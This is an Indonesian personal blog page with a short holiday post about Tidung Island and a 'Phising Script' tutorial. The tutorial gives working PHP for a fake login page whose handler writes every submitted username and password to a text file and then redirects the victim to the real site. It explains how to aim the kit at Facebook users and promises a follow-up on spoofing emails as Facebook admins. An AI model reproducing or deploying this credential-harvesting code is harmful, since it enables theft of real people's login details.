Popular Posts

Powered by Blogger.

Holiday in Tidung Island

Monday, December 27, 2010


Hah....akhir nya bisa nulis nulis lagi setelah sekian lama sibuk dengan aktifitas gw......
kemarin setelah uts yg memuakkan....akhir nya gw bisa liburan juga...
ya ya ya...


TIDUNG ISLAND


lumayan sangat puas kok di sana 3hari 2 malam....
suasana nya dapet banget buat hunting foto....


hmm....
masukin foto aja ah...


ini asli jepretan dan ga ada editan sama sekali loh foto nya....


check this out >>>



Read Post | comments

Phising Script

Saturday, December 4, 2010


Hmm ini dia langkah selanjut nya setelah anda membaca Mengenal Phising,   langkah selanjut nya adalah kita membuat Fake Login...langsung aja deh gw buatin script nya

nih liat baik baik.....

  1. Buat lah Script bernama index.php (berisi login form dan me redirect ke kirim.php)

login

pass


Download Index.php

Setelah anda download.... lihat pada bagian form action nya...
saya menggunakan http://h1.ripway.com/hitbreaker/phising/kirim.php karena saya menaruh file kirim.php nya di ripway......


okeh..beres deh untuk login form nya...

sekarang kita buat proses nya....


2. Membuat file kirim.php
 <?php
header ('Location:  http://h1.ripway.com/hitbreaker/phising/passwords.txt ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle) ;
exit;
?>



Penjelasan dari script di atas...

fungsi dari headerlocation adalah me redirect/memanggil halaman yg di tuju....

jadi di dalam file kirim.php ini merupakan proses input data ke passwords.txt...

jadi msalkan kamu mau phising facebook..tinggal di rubah saja header location nya menjadi link login facebook berada....



okeh beres semua peralatan untuk phising nya.....

tutorial selanjut nya adalah fake email..
ex: facebook..
maka kita akan membuat email mengatas namakan admin facebook/admin@facebook.com

tunggu jam tayang nya aja yah... ^ ^
Read Post | comments
 
© Copyright Idekubagus 2011 - Some rights reserved | Powered by Blogger.com.
Template Design by Fadly Nozella | Published by Borneo Templates and Theme4all